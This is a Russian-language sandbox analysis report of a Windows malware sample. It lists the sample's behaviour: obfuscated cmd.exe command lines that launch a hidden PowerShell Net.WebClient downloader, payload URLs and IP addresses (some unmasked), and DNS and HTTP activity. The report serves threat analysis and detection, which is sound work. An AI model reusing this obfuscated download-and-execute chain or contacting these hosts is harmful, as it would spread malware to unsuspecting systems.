Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set PNsZ=cvrJDqtzuzAYomGdMSznaQDrdbX71pFOkf6.80esULNKR-B+h lxP),24\WiywTg({Z=E\:5}@I'CH;3j$&&for %N in (81,61,61,12,67,75,43,18,44,75,78,81,32,74,22...
Сетевая активность
Подключается к
- 'sp####etmedia.com':80
- 'sp####etmedia.com':443
- '5p####.quantsapp.com':80
- '5p####.quantsapp.com':443
- '13.##8.100.132':80
TCP
Запросы HTTP GET
- http://www.sp####etmedia.com/EXaR
- http://13.##7.126.242/cCYYY
Другие
- 'sp####etmedia.com':443
- '5p####.quantsapp.com':443
UDP
- DNS ASK sp####etmedia.com
- DNS ASK 5p####.quantsapp.com
- DNS ASK ar##ly.ru
- DNS ASK sd#####ecofriendly.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set PNsZ=cvrJDqtzuzAYomGdMSznaQDrdbX71pFOkf6.80esULNKR-B+h lxP),24\WiywTg({Z=E\:5}@I'CH;3j$&&for %N in (81,61,61,12,67,75,43,18,44,75,78,81,32,74,22...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set PNsZ=cvrJDqtzuzAYomGdMSznaQDrdbX71pFOkf6.80esULNKR-B+h lxP),24/WiywTg({Z=E\:5}@I'CH;3j$&&for %N in (81,61,61,12,67,75,43,18,44,75,78,81,32,74,22,67,19,38,61,45,12,25,80,38,0,6,49,42,38...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $wwo='KzR';$kID=new-object Net.WebClient;$pMA='http://www.sp####etmedia.com/EXaR@http://13.127.126.242/cCYYY@http://13.228.100.132/hFKNNaDM@http://artsly.ru/PLd2di@http://www.sdv...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=DFmyE. tokens=2" %7 IN ('assoc^|find "llDa"') DO %7 -"
- '<SYSTEM32>\cmd.exe' /c assoc|find "llDa"
- '<SYSTEM32>\cmd.exe' /S /D /c" assoc"
- '<SYSTEM32>\find.exe' "llDa"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
